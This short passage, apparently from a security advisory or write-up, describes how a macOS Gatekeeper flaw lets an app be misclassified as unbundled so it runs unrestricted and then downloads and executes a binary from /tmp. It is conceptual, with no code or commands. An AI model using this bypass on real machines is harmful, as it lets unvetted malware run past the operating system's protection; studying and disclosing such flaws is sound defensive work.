Gatekeeper would misclassify certain types of applications allowing them to run without any restriction. Specifically you can cause a confusion in the policy engine regarding whether the app is bundled or not. You can trick it into thinking it’s not a bundled app when it is, which leads to it being misclassified and sets the allowed flag on the script.

Once allowed it can download a binary to /tmp to execute.